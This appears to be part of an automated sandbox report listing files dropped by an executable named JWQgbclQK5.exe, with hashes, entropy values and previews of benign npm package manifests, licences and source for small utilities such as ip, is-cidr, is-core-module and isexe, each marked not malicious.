              Preview:{.."name": "ip-regex",.."version": "4.3.0",.."description": "Regular expression for matching IP addresses (IPv4 & IPv6)",.."license": "MIT",.."repository": "sindresorhus/ip-regex",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."ip",..."ipv6",..."ipv4",..."regex",..."regexp",..."re",..."match",..."test",..."find",..."text",..."pattern",..."internet",..."protocol",..."address",..."validate"..],.."devDependencies": {..."ava": "^1.4.1",..."tsd": "^0.7.2",..."xo": "^0.24.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):10251
              Entropy (8bit):5.022027570834499
              Encrypted:false
              SSDEEP:
              MD5:913252E1909C1DF4FC8E90150C1C95EE
              SHA1:1D8A22AAEC7B196E6A0A3F2D5E4E81F981B191D7
              SHA-256:A7A6D13FB2D9FF0A2DE7A3BD4DF56023F43DEACDE318E75C11E293D568C67F0C
              SHA-512:2BC6FFA2F42051617A004E93299ACEDC21A4621654720EE5F26585E43A3943D276778CF8301B22934AAA27249C87E2E8FB8F20329EB076E56C6D3933665A14BD
              Malicious:false
              Reputation:unknown
              Preview:const ip = exports;.const { Buffer } = require('buffer');.const os = require('os');..ip.toBuffer = function (ip, buff, offset) {. offset = ~~offset;.. let result;.. if (this.isV4Format(ip)) {. result = buff || Buffer.alloc(offset + 4);. ip.split(/\./g).map((byte) => {. result[offset++] = parseInt(byte, 10) & 0xff;. });. } else if (this.isV6Format(ip)) {. const sections = ip.split(':', 8);.. let i;. for (i = 0; i < sections.length; i++) {. const isv4 = this.isV4Format(sections[i]);. let v4Buffer;.. if (isv4) {. v4Buffer = this.toBuffer(sections[i]);. sections[i] = v4Buffer.slice(0, 2).toString('hex');. }.. if (v4Buffer && ++i < 8) {. sections.splice(i, 0, v4Buffer.slice(2, 4).toString('hex'));. }. }.. if (sections[0] === '') {. while (sections.length < 8) sections.unshift('0');. } else if (sections[sections.length - 1] === '') {. while (sections.length < 8) sections.push('0');. } else if
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):560
              Entropy (8bit):4.702589127712746
              Encrypted:false
              SSDEEP:
              MD5:3820E81BF1452B5F0B87F407EA4957DC
              SHA1:E30787A4D020BCA9E734678D71EA30463781FC19
              SHA-256:EF7191A9FBE6593C86A922192B0F92253601C27A8755AF7CD1F8E632A011DDB0
              SHA-512:2DEA7D889ABB9BB526A6E69B843807D69C424BAFAEBD0C8A9233FC8500B720416702A4D53C6C49EDC751F36C9248E6F847785D0136A0C40F587A13C4C0AD8666
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "ip",. "version": "2.0.0",. "author": "Fedor Indutny <fedor@indutny.com>",. "homepage": "https://github.com/indutny/node-ip",. "repository": {. "type": "git",. "url": "http://github.com/indutny/node-ip.git". },. "files": [. "lib",. "README.md". ],. "main": "lib/ip",. "devDependencies": {. "eslint": "^8.15.0",. "mocha": "^10.0.0". },. "scripts": {. "lint": "eslint lib/*.js test/*.js",. "test": "npm run lint && mocha --reporter spec test/*-test.js",. "fix": "npm run lint -- --fix". },. "license": "MIT".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1290
              Entropy (8bit):5.099876496556989
              Encrypted:false
              SSDEEP:
              MD5:7676693AA448E7AD480D8ECA57E953D6
              SHA1:081863FDEA26BF5DB6C6348C743F2F12CA27AB72
              SHA-256:23E60503DC06ABF04B9E535E17797B4E0F9224E6C5ABF9207317D5A67C88C743
              SHA-512:347E964C183E7EAAD433F515A3116A46A4404D3E1FFAEB066F6ABB29A9B4595EA71F06B6011F1CCF7F7567994B3E469E481A43C1D7D8B0FEAA95325E60766019
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) silverwind.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer..2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR.ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES.(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):271
              Entropy (8bit):4.565066778120474
              Encrypted:false
              SSDEEP:
              MD5:B6CA5AB13069C5B2BF65B4D8146D28C9
              SHA1:D61CAB7CEDDAA43AE3C2B89F042060F5EEF05133
              SHA-256:FA846AF4404056F010E3AB5DF1536D9DCDEB1D922394F5D1C7D4F80C52601720
              SHA-512:34EA82C0A61FC5C0482EDB6AD643CC46D141F8FFD6419F5129D9AF3D9AA5B0376E224F91C27F08B9047BA6BBA36DF63706DC58FB5C26058AB64553647036150C
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.const {v4, v6} = require("cidr-regex");..const re4 = v4({exact: true});.const re6 = v6({exact: true});..module.exports = str => re4.test(str) ? 4 : (re6.test(str) ? 6 : 0);.module.exports.v4 = str => re4.test(str);.module.exports.v6 = str => re6.test(str);.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):889
              Entropy (8bit):4.619995648697239
              Encrypted:false
              SSDEEP:
              MD5:EFCA0EF6D93503FC006530EA6BA6E221
              SHA1:5B9ED45F87A562306D3040D99D46478A006B4856
              SHA-256:8DB7D4A620C87CD83C2C28E48BF14FAA3E7D72FF28E6120D9F42054111C28E0B
              SHA-512:1D4F156D4C7C39FACA8B25792356F233E50496E9B19FBAED00AF386DF0DEF81D60FBD77531B6ABD25DAFEBAD91C1CE36569257C1A165556867FB427DA850095A
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "is-cidr",. "version": "4.0.2",. "description": "Check if a string is an IP address in CIDR notation",. "author": "silverwind <me@silverwind.io>",. "contributors": [. "Felipe Apostol <flipjs.io@gmail.com> (http://flipjs.io/)". ],. "repository": "silverwind/is-cidr",. "license": "BSD-2-Clause",. "scripts": {. "test": "make test". },. "engines": {. "node": ">=10". },. "files": [. "index.js",. "index.d.ts". ],. "keywords": [. "cidr",. "regex",. "notation",. "cidr notation",. "prefix",. "prefixes",. "ip",. "ip address",. "network". ],. "dependencies": {. "cidr-regex": "^3.1.1". },. "devDependencies": {. "eslint": "7.10.0",. "eslint-config-silverwind": "18.0.10",. "jest": "26.4.2",. "updates": "11.1.5",. "versions": "8.4.3". },. "jest": {. "verbose": false,. "testTimeout": 10000. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1078
              Entropy (8bit):5.10400582486638
              Encrypted:false
              SSDEEP:
              MD5:02B0FB5FF4014A08FD4193BC3E2349E2
              SHA1:66CFC7AEA4D47EC6B426153339698F1D99F3CFDE
              SHA-256:5C496CE5AE47EB8E5DDCAA5E29C27C446A3855B19E3A66991B52F361BED22B28
              SHA-512:D6624A519F58969CAAA906650DE5BFE02083DA46AEA1492CC32D78DF5B16E52892F04BDADB75EE7D0893561E4D7A6D969B33ABE5DC8AB20D9D5D6AC970881064
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2014 Dave Justice..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of.the Software, and to permit persons to whom the Software is furnished to do so,.subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):5769
              Entropy (8bit):4.893824455009905
              Encrypted:false
              SSDEEP:
              MD5:49E95E84E429668738695DF34D545B9B
              SHA1:37C6F915FF10B52F46B1AE5C21E3F24DEBF5A4B8
              SHA-256:3B15132ED44AC6E1C4C5BAB6047118668B5EED571CF462A01902EFDA724D6295
              SHA-512:324D1DC3FADC7ADB74A121AD74B756C9AB329590E253B2C3AEC544B372A9DBFBCC9282FD4A7D0CC5BE03762E34D9CDEBAF1F4787825723EAE3D96356BCB1D995
              Malicious:false
              Reputation:unknown
              Preview:{.."assert": true,.."node:assert": [">= 14.18 && < 15", ">= 16"],.."assert/strict": ">= 15",.."node:assert/strict": ">= 16",.."async_hooks": ">= 8",.."node:async_hooks": [">= 14.18 && < 15", ">= 16"],.."buffer_ieee754": ">= 0.5 && < 0.9.7",.."buffer": true,.."node:buffer": [">= 14.18 && < 15", ">= 16"],.."child_process": true,.."node:child_process": [">= 14.18 && < 15", ">= 16"],.."cluster": ">= 0.5",.."node:cluster": [">= 14.18 && < 15", ">= 16"],.."console": true,.."node:console": [">= 14.18 && < 15", ">= 16"],.."constants": true,.."node:constants": [">= 14.18 && < 15", ">= 16"],.."crypto": true,.."node:crypto": [">= 14.18 && < 15", ">= 16"],.."_debug_agent": ">= 1 && < 8",.."_debugger": "< 8",.."dgram": true,.."node:dgram": [">= 14.18 && < 15", ">= 16"],.."diagnostics_channel": [">= 14.17 && < 15", ">= 15.1"],.."node:diagnostics_channel": [">= 14.18 && < 15", ">= 16"],.."dns": true,.."node:dns": [">= 14.18 && < 15", ">= 16"],.."dns/promises": ">= 15",.."node:dns/promises": ">= 16",.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1757
              Entropy (8bit):4.911393091725187
              Encrypted:false
              SSDEEP:
              MD5:A65EEC6935F0EADCDD9C6ED89B00A878
              SHA1:05C87F01A5BFE72321888D75F680F44A346BC96E
              SHA-256:D85385D76EB4472E94D7CC3E6287BDD19D81ABB057E96FFA1449795521578EA1
              SHA-512:43F7266491630BC622257B9F89F161E07C9E80EE717B868BA2D5BD943F983340D743718847FA9E93BA6E9F0D8041E1CBB3AACF00341E05A103D6E9CFD33EA793
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var has = require('has');..function specifierIncluded(current, specifier) {..var nodeParts = current.split('.');..var parts = specifier.split(' ');..var op = parts.length > 1 ? parts[0] : '=';..var versionParts = (parts.length > 1 ? parts[1] : parts[0]).split('.');...for (var i = 0; i < 3; ++i) {...var cur = parseInt(nodeParts[i] || 0, 10);...var ver = parseInt(versionParts[i] || 0, 10);...if (cur === ver) {....continue; // eslint-disable-line no-restricted-syntax, no-continue...}...if (op === '<') {....return cur < ver;...}...if (op === '>=') {....return cur >= ver;...}...return false;..}..return op === '>=';.}..function matchesRange(current, range) {..var specifiers = range.split(/ ?&& ?/);..if (specifiers.length === 0) {...return false;..}..for (var i = 0; i < specifiers.length; ++i) {...if (!specifierIncluded(current, specifiers[i])) {....return false;...}..}..return true;.}..function versionIncluded(nodeVersion, specifierValue) {..if (typeof specifierValue === 'bool
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1849
              Entropy (8bit):5.086059852239787
              Encrypted:false
              SSDEEP:
              MD5:44BC74127EACC67ED7C28057B339CC34
              SHA1:D82F6C454BF09CDBF898D8343882935DD11C134A
              SHA-256:6B129CE5E76B96E420482FDBE1BF54CF821233C6E5A90916281D8949C1314CE5
              SHA-512:BC4BA2F3AC0A896EF093B8B249936ECA3195C322AFBCFF0ED51DB8EEA32D18E4AF9004082731B81A90A535ECB2434C8AC3E4102AB2BF8CCD0F68CF12FD5A57D1
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "is-core-module",.."version": "2.13.0",.."description": "Is this specifier a node.js core module?",.."main": "index.js",.."sideEffects": false,.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prepublishOnly": "safe-publish-latest",..."lint": "eslint .",..."pretest": "npm run lint",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+https://github.com/inspect-js/is-core-module.git"..},.."keywords": [..."core",..."modules",..."module",..."npm",..."node",..."dependencies"..],.."author
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4072
              Entropy (8bit):5.004228353791703
              Encrypted:false
              SSDEEP:
              MD5:9434E7EE575518CB07633B0AE1D32989
              SHA1:2C80A974E747885F90B423890BF5CFD64FEE8319
              SHA-256:36371503C167AA8660AD749BDF4C74FA7058F6B57BF2D0BE64B6E5D104E1952E
              SHA-512:503E485D64EC5DD540F37767DDFDA603DBD8E5D0EF9C5C1ABC68B27A8C427E47895E9092C679BDA89C4D8A705DD56D6DBD4574BAE2E55B6B09856E92D14706E8
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var test = require('tape');.var keys = require('object-keys');.var semver = require('semver');.var mockProperty = require('mock-property');..var isCore = require('../');.var data = require('../core.json');..var supportsNodePrefix = semver.satisfies(process.versions.node, '^14.18 || >= 16', { includePrerelease: true });..test('core modules', function (t) {..t.test('isCore()', function (st) {...st.ok(isCore('fs'));...st.ok(isCore('net'));...st.ok(isCore('http'));....st.ok(!isCore('seq'));...st.ok(!isCore('../'));....st.ok(!isCore('toString'));....st.end();..});...t.test('core list', function (st) {...var cores = keys(data);...st.plan(cores.length);....for (var i = 0; i < cores.length; ++i) {....var mod = cores[i];....var requireFunc = function () { require(mod); }; // eslint-disable-line no-loop-func....if (isCore(mod)) {.....st.doesNotThrow(requireFunc, mod + ' supported; requiring does not throw');....} else {.....st['throws'](requireFunc, mod + ' not supported; requirin
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1756
              Entropy (8bit):5.281569334928889
              Encrypted:false
              SSDEEP:
              MD5:4E13E3959F8C2840A6A8AB3DA43C1E5B
              SHA1:8D9C9023A3B6C9F8474E60F99CE698F68C1F4C5B
              SHA-256:7DB24C9C5D58273BA32EEE1BEC3DFEBD393FDEDDD0B5879EF01DC595476E6979
              SHA-512:B68CCCCFBEEDF0596808498C004AE2E69C9739830D92F9C86D4B1A7F234F79A7F4DBF3F081993256E0C6164A5904472420CBC7C734FAB54F1372036BE41D755A
              Malicious:false
              Reputation:unknown
              Preview:/* eslint-disable yoda */.'use strict';..const isFullwidthCodePoint = codePoint => {..if (Number.isNaN(codePoint)) {...return false;..}...// Code points are derived from:..// http://www.unix.org/Public/UNIDATA/EastAsianWidth.txt..if (...codePoint >= 0x1100 && (....codePoint <= 0x115F || // Hangul Jamo....codePoint === 0x2329 || // LEFT-POINTING ANGLE BRACKET....codePoint === 0x232A || // RIGHT-POINTING ANGLE BRACKET....// CJK Radicals Supplement .. Enclosed CJK Letters and Months....(0x2E80 <= codePoint && codePoint <= 0x3247 && codePoint !== 0x303F) ||....// Enclosed CJK Letters and Months .. CJK Unified Ideographs Extension A....(0x3250 <= codePoint && codePoint <= 0x4DBF) ||....// CJK Unified Ideographs .. Yi Radicals....(0x4E00 <= codePoint && codePoint <= 0xA4C6) ||....// Hangul Jamo Extended-A....(0xA960 <= codePoint && codePoint <= 0xA97C) ||....// Hangul Syllables....(0xAC00 <= codePoint && codePoint <= 0xD7A3) ||....// CJK Compatibility Ideographs....(0xF900 <= codePoint && co
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):4.810155886293027
              Encrypted:false
              SSDEEP:
              MD5:7C2DFA1F539B955D64D6AF55282E1D9E
              SHA1:49DBCBA3EB3E3CBA5B97BCE28EB6194775D23C88
              SHA-256:5B48496CA129073ED44A677B777EA3B91366C8BC228BC75FE858749A78AC1A32
              SHA-512:C72077C7BF831EF800F96BAFE42B3E2534F71CCEF210D95823156398D93C37CA29E7F3EC547B7A9F8FEC0C94B42647AA5FE33596E0671A2B4F985236CA236C38
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "is-fullwidth-code-point",.."version": "3.0.0",.."description": "Check if the character represented by a given Unicode code point is fullwidth",.."license": "MIT",.."repository": "sindresorhus/is-fullwidth-code-point",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd-check"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."fullwidth",..."full-width",..."full",..."width",..."unicode",..."character",..."string",..."codepoint",..."code",..."point",..."is",..."detect",..."check"..],.."devDependencies": {..."ava": "^1.3.1",..."tsd-check": "^0.5.0",..."xo": "^0.24.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1091
              Entropy (8bit):5.118124742141511
              Encrypted:false
              SSDEEP:
              MD5:66D1A8CF6CE2A2458584A6DF341B7DA0
              SHA1:AAD15E667CDC9F19794613A1425F1DB4C290C41A
              SHA-256:4736DF0AA50D339E32C2364B5FAFEB923075E8F92EA4CC2AC5C9CA926783FFC5
              SHA-512:DC8153A34B0D3E7E6642339E8BCDA7F42206623B6FADF9CF4EFEB74680388B5CD08F8A7E9D729EEC4F2A8C1DC0D7C14A88A8ADFF48E36EAE603412A02CF23B60
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2016-2017 Thomas Watson Steen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FRO
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):114
              Entropy (8bit):5.141065264685636
              Encrypted:false
              SSDEEP:
              MD5:B1B24779FD953C34D69ED58CDFD104BA
              SHA1:613E421504BC8B8AED266C281BC01710E9A95D9E
              SHA-256:B08397C5985A5AC96C365472C92A83D5D72E8577EEF3925DC969B1893BC9F509
              SHA-512:5592803177B43098C38FE80FADE33068E6665D523C0BA728EC819AA787BF7EA63BDF3D5890A002FF3892F2B7187E0BA8A245CBC10E21DB01433CEC14A7BDBD5F
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..module.exports = !!(. (process.env.LAMBDA_TASK_ROOT && process.env.AWS_EXECUTION_ENV) ||. false.).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):773
              Entropy (8bit):4.792375188647615
              Encrypted:false
              SSDEEP:
              MD5:CE8E69CE623D91570E5FB24079A0990D
              SHA1:D7D1AC3B9E27615002074F87DA8C39E91995EE88
              SHA-256:55C72A97449E2B52A5B763BF6CFA7DE3B9603FE2A57074066DDCBF522578C9B6
              SHA-512:DE2F36183A5F727151F23E2793FD4A47221F1042DE29E506276531CCF9FFEFA9DDFBF3F38DB0B0E83F54338B8BA5C95662C90546761057CDEFD05661DD55470D
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "is-lambda",. "version": "1.0.1",. "description": "Detect if your code is running on an AWS Lambda server",. "main": "index.js",. "dependencies": {},. "devDependencies": {. "clear-require": "^1.0.1",. "standard": "^10.0.2". },. "scripts": {. "test": "standard && node test.js". },. "repository": {. "type": "git",. "url": "https://github.com/watson/is-lambda.git". },. "keywords": [. "aws",. "hosting",. "hosted",. "lambda",. "detect". ],. "author": "Thomas Watson Steen <w@tson.dk> (https://twitter.com/wa7son)",. "license": "MIT",. "bugs": {. "url": "https://github.com/watson/is-lambda/issues". },. "homepage": "https://github.com/watson/is-lambda",. "coordinates": [. 37.3859955,. -122.0838831. ].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):321
              Entropy (8bit):5.036854365275682
              Encrypted:false
              SSDEEP:
              MD5:9C487AE0E45D4B607720BB6220F289E8
              SHA1:76D8EC639D9289818E307A8E56DF1A84D2807D5D
              SHA-256:C04942642319190AC40E01566F2DB9501C5BFC2FB39D37B6EEF6B34464D7A616
              SHA-512:50D3C5095221581914395CE73EBBAD2EEA43F732321712122870F03F4A73B0B81A433C7E643E3D314C0B3F7705D98460D82A64366D63E1F0ACED25022EF43E21
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..var assert = require('assert').var clearRequire = require('clear-require')..process.env.AWS_EXECUTION_ENV = 'AWS_Lambda_nodejs6.10'.process.env.LAMBDA_TASK_ROOT = '/var/task'..var isCI = require('./').assert(isCI)..delete process.env.AWS_EXECUTION_ENV..clearRequire('./').isCI = require('./').assert(!isCI).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1192
              Entropy (8bit):4.50454339159264
              Encrypted:false
              SSDEEP:
              MD5:1A5F173769C2C3B82A211AB81EBB13B9
              SHA1:9348ECE80FD6208F0B8740D43CD652DB4A5F06E6
              SHA-256:7AF7A68708317AB2B8743B44591D98CA6F5CA787E89E7C289154471FD2F67331
              SHA-512:88EACBC8AEAA623162E44DF849AECDD1E35043B726DA567E4A97E26BF035C211357D55C20E0CBF8900583B7CEB1677C182D97FA98DB28B86DF2D0C86D9A2517B
              Malicious:false
              Reputation:unknown
              Preview:var fs = require('fs').var core.if (process.platform === 'win32' || global.TESTING_WINDOWS) {. core = require('./windows.js').} else {. core = require('./mode.js').}..module.exports = isexe.isexe.sync = sync..function isexe (path, options, cb) {. if (typeof options === 'function') {. cb = options. options = {}. }.. if (!cb) {. if (typeof Promise !== 'function') {. throw new TypeError('callback not provided'). }.. return new Promise(function (resolve, reject) {. isexe(path, options || {}, function (er, is) {. if (er) {. reject(er). } else {. resolve(is). }. }). }). }.. core(path, options || {}, function (er, is) {. // ignore EACCES because that just means we aren't allowed to run it. if (er) {. if (er.code === 'EACCES' || options && options.ignoreErrors) {. er = null. is = false. }. }. cb(er, is). }).}..function sync (path, options) {. // my kingdom for a filtered catch.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):909
              Entropy (8bit):4.696068756209526
              Encrypted:false
              SSDEEP:
              MD5:E4AE002FD14A8BF3666FE9B2C811E8BB
              SHA1:5F33B53CC6B89F9EBE2EBD1DCFEB434CD96A3192
              SHA-256:0381513485DD6D0799B160A5C0BF7B4A79D1ECE5C32182DE44AA73F756A7AC54
              SHA-512:FD656291DBFC15B0278E531F37F3612EAC10BAC6E7F516E146B9694FD149F47E3A7EAD8C1A3A3CD41DABAD7D0D2DDA2D97F6EF9559F0FA35D5DE83EF87E4168F
              Malicious:false
              Reputation:unknown
              Preview:module.exports = isexe.isexe.sync = sync..var fs = require('fs')..function isexe (path, options, cb) {. fs.stat(path, function (er, stat) {. cb(er, er ? false : checkStat(stat, options)). }).}..function sync (path, options) {. return checkStat(fs.statSync(path), options).}..function checkStat (stat, options) {. return stat.isFile() && checkMode(stat, options).}..function checkMode (stat, options) {. var mod = stat.mode. var uid = stat.uid. var gid = stat.gid.. var myUid = options.uid !== undefined ?. options.uid : process.getuid && process.getuid(). var myGid = options.gid !== undefined ?. options.gid : process.getgid && process.getgid().. var u = parseInt('100', 8). var g = parseInt('010', 8). var o = parseInt('001', 8). var ug = u | g.. var ret = (mod & o) ||. (mod & g) && gid === myGid ||. (mod & u) && uid === myUid ||. (mod & ug) && myUid === 0.. return ret.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):786
              Entropy (8bit):4.701962862080152
              Encrypted:false
              SSDEEP:
              MD5:B7340828EE0E123814F9B855953DE714
              SHA1:3B3EAB80C4FFD08EEF6B3381B98DE7BE3649D06B
              SHA-256:395C2AF9ABEEAAFE7391974C1EACFB2A2BDEEF187F21C3F5582C49E0368E59BF
              SHA-512:44B8310C47161F3000A46AB9A9C4EA9501894FF6993832E4AEA4FF1057626B8FF56942044F72FAEBD8F7603CF05E2C3C4FD194FF83A60D9CEBE254F1DFE582A7
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "isexe",. "version": "2.0.0",. "description": "Minimal module to check if a file is executable.",. "main": "index.js",. "directories": {. "test": "test". },. "devDependencies": {. "mkdirp": "^0.5.1",. "rimraf": "^2.5.0",. "tap": "^10.3.0". },. "scripts": {. "test": "tap test/*.js --100",. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --all; git push origin --tags". },. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)",. "license": "ISC",. "repository": {. "type": "git",. "url": "git+https://github.com/isaacs/isexe.git". },. "keywords": [],. "bugs": {. "url": "https://github.com/isaacs/isexe/issues". },. "homepage": "https://github.com/isaacs/isexe#readme".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4996
              Entropy (8bit):4.649604592698887
              Encrypted:false
              SSDEEP:
              MD5:D6149183BC6A5EE3220291B53E5F4567
              SHA1:5ECBF6A46A596324CB23FDCA6DF539BE08A4F4EE
              SHA-256:7FA5CE613B782CB924483BCCD775A56F129B9B381DF4D346A9C951A789B31A90
              SHA-512:7A5AC0FAE879EF2E9C7CFACB36F728ADBA580EE380DEC23647E7131881F5264FA7ABA63C7B85C177BE6A2CE6702736EF9634E452B738F52958E7C254716CD970
              Malicious:false
              Reputation:unknown
              Preview:var t = require('tap').var fs = require('fs').var path = require('path').var fixture = path.resolve(__dirname, 'fixtures').var meow = fixture + '/meow.cat'.var mine = fixture + '/mine.cat'.var ours = fixture + '/ours.cat'.var fail = fixture + '/fail.false'.var noent = fixture + '/enoent.exe'.var mkdirp = require('mkdirp').var rimraf = require('rimraf')..var isWindows = process.platform === 'win32'.var hasAccess = typeof fs.access === 'function'.var winSkip = isWindows && 'windows'.var accessSkip = !hasAccess && 'no fs.access function'.var hasPromise = typeof Promise === 'function'.var promiseSkip = !hasPromise && 'no global Promise'..function reset () {. delete require.cache[require.resolve('../')]. return require('../').}..t.test('setup fixtures', function (t) {. rimraf.sync(fixture). mkdirp.sync(fixture). fs.writeFileSync(meow, '#!/usr/bin/env cat\nmeow\n'). fs.chmodSync(meow, parseInt('0755', 8)). fs.writeFileSync(fail, '#!/usr/bin/env false\n'). fs.chmodSync(fail, parseInt(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):890
              Entropy (8bit):4.7142008074099815
              Encrypted:false
              SSDEEP:
              MD5:2A44BCC05F54DDDEB33A1776EE7E481A
              SHA1:1A6D0C635F67223D5E3890068F32F2DA46E45151
              SHA-256:B422B8FBB7815542DFBD1B3ADAEC5700249A1934C44A1D994654329C06FC1018
              SHA-512:E44EB173016AEC24C77263FCF5D62468AEE66035675FD4DC4563375EDAC403EF0FFA20C6047FEA4F46B5223F4020F554475865E2ED67D51158E31AFEA097FF05
              Malicious:false
              Reputation:unknown
              Preview:module.exports = isexe.isexe.sync = sync..var fs = require('fs')..function checkPathExt (path, options) {. var pathext = options.pathExt !== undefined ?. options.pathExt : process.env.PATHEXT.. if (!pathext) {. return true. }.. pathext = pathext.split(';'). if (pathext.indexOf('') !== -1) {. return true. }. for (var i = 0; i < pathext.length; i++) {. var p = pathext[i].toLowerCase(). if (p && path.substr(-p.length).toLowerCase() === p) {. return true. }. }. return false.}..function checkStat (stat, path, options) {. if (!stat.isSymbolicLink() && !stat.isFile()) {. return false. }. return checkPathExt(path, options).}..function isexe (path, options, cb) {. fs.stat(path, function (er, stat) {. cb(er, er ? false : checkStat(stat, path, options)). }).}..function sync (path, options) {. return checkStat(fs.statSync(path), path, options).}.
